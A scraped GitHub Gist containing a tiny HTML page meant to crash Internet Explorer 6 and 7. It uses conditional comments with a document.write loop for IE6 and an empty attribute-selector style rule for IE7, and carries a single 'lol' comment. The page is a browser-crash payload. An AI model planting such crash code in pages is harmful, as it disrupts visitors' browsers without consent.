Last active
September 24, 2015 09:08
-
-
Save nathansmith/724308 to your computer and use it in GitHub Desktop.
This should crash IE6 & IE7.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8" /> | |
<title>Crash IE6 + IE7</title> | |
<!--[if IE 6]> | |
<script> | |
for (x in document.write) { | |
document.write(x); | |
} | |
</script> | |
<![endif]--> | |
<!--[if IE 7]> | |
<style> | |
button[value=""]{} | |
</style> | |
<![endif]--> | |
</head> | |
<body> | |
This should crash in IE6 + IE7. | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
lol